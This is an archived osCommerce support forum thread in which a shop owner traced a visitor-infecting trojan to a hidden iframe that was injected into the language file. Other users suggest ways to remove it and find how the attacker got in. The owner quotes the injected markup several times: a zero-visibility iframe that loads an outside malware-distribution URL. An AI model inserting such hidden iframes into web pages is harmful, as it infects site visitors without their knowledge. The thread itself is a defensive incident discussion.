Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

WEBSITE POSSIBLY HACKED!

Onstar

By Onstar
in General Support

Recommended Posts

Onstar

Onstar

Posted
Posted

Hello everybody,

 

I am not sure what's going on. I will attempt to explain this as much as I can. For about a week now, I have been trying to find out why every computer I used downloaded a trojan immediately the page loads up. I tried this on 4 different computers on 4 different networks. I tried one of them on a different State and zipcode. I finally decided that there has been a hack.

 

Symptoms: Immediately the home page loads up, a virus called 'JS/Wonka' is detected. Also, while the page is loading up, if you look at the bottom of the page, you will see 'Opening page...www.websitemafia.com'. This domain quickly disappears as soon as the page loads up.

 

I was looking a the html source code via view->source on top of my internet explorer browser and I saw these lines:

 

 

<IFRAME src="http://www.traffloads.info/out.php?s_id=1" width=5 height=5 style="display:none"></IFRAME>

<IFRAME src="http://www.traffloads.info/out.php?s_id=1" width=5 height=5 style="display:none"></IFRAME>

<IFRAME src="http://www.traffloads.info/out.php?s_id=1" width=5 height=5 style="display:none"></IFRAME>

 

It looks like these lines of code are somewhere in one of my files. Could be the pages that load first. May be index.php or htm?

 

Does anybody know how to tackle this thing? I am not sure where to start. I really do need help.

 

My host said that my account is in *nix that it is not possible to have this virus in it.

 

I will appreicate any help anyone is willing to give.

 

Thanks,

Onstar

mtechama

mtechama

Posted
Posted

It says that website can not be found. are you sure that is the currect web address

Wade Morris

Amarillo, Texas

 

Before you do any changes on your site you need to do BACKUP! BACKUP!

Onstar

Onstar

Posted
  • Author
Posted
It says that website can not be found. are you sure that is the currect web address

 

Ok, I have an update. That <IFRAME......</IFRAME> is in includes/languages/english/index.php. I am not sure what this concievably does. I believe that it has something to do with my problem based on things I found on google. Does anyone think the same?

 

Please help.

Guest

Guest

Posted
Posted
Ok, I have an update. That <IFRAME......</IFRAME> is in includes/languages/english/index.php. I am not sure what this concievably does.

if you didn't put it there, remove it.

 

 

I believe that it has something to do with my problem based on things I found on google. Does anyone think the same?

osc doesn't use iframes, so you're probably correct

 

now you need to determine how they got into your site to paste their line of crap into the source code of your website. if you figure out how, do post and let all of us know so we can make sure we aren't taken advantage of also :)

Onstar

Onstar

Posted
  • Author
Posted
if you didn't put it there, remove it.

osc doesn't use iframes, so you're probably correct

 

now you need to determine how they got into your site to paste their line of crap into the source code of your website. if you figure out how, do post and let all of us know so we can make sure we aren't taken advantage of also :)

 

 

I will try and find out how they got in. I will like any suggestions on things to look into to determine method of entry. I guess my questions remains: is the reason for pasting the code only to infect computers?

 

How does the iframe stuff relate to the webmastermafia.com that was showing up on the lower window pane when the page was loading up?

mtechama

mtechama

Posted
Posted
I will try and find out how they got in. I will like any suggestions on things to look into to determine method of entry. I guess my questions remains: is the reason for pasting the code only to infect computers?

 

How does the iframe stuff relate to the webmastermafia.com that was showing up on the lower window pane when the page was loading up?

 

 

Ok on what website webmastermafia.com or websitemafia.com?

Wade Morris

Amarillo, Texas

 

Before you do any changes on your site you need to do BACKUP! BACKUP!

gatovioleta

gatovioleta

Posted
Posted

I would recommend not going to any of the URL's posted here - a vulnerable computer can easily be destroyed (yes really) by visiting this type of site.

 

Most likely somebody has managed to get in through your osCommerce admin and use the 'define languages' option to insert the iframe. This 'feature' is rarely used and should be disable/removed from the osCommerce package, along with the file manger.

 

Raoul

Guest

Guest

Posted
Posted
I will try and find out how they got in. I will like any suggestions on things to look into to determine method of entry.

check your raw access logs to see if there's any peculiar activity (if you have cpanel, you can download them from there)

 

 

I guess my questions remains: is the reason for pasting the code only to infect computers?

 

How does the iframe stuff relate to the webmastermafia.com that was showing up on the lower window pane when the page was loading up?

more than likely it's just to infect or steal something from your visitor. the only way to know for usre is to do a search for the virus name and see what it does (usually symantac's site has such descriptions)

 

the loading from the mafia thingy site is probably from encoded code into the virus, maybe grabbing something from their site to try and inject to the visitor. search their name as well and see if anyone else is talking about what they do or how they got into the victim's site. i certainly wouldn't visit the offending site though.

 

 

do you have the most recent security fixes (from november 05) installed? if not, head to the announcements forum and get them

Onstar

Onstar

Posted
  • Author
Posted
check your raw access logs to see if there's any peculiar activity (if you have cpanel, you can download them from there)

more than likely it's just to infect or steal something from your visitor. the only way to know for usre is to do a search for the virus name and see what it does (usually symantac's site has such descriptions)

 

the loading from the mafia thingy site is probably from encoded code into the virus, maybe grabbing something from their site to try and inject to the visitor. search their name as well and see if anyone else is talking about what they do or how they got into the victim's site. i certainly wouldn't visit the offending site though.

do you have the most recent security fixes (from november 05) installed? if not, head to the announcements forum and get them

 

 

Hello Eww,

 

can you tell me what the security fixes were, please? or post a link?

 

Thank you.

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...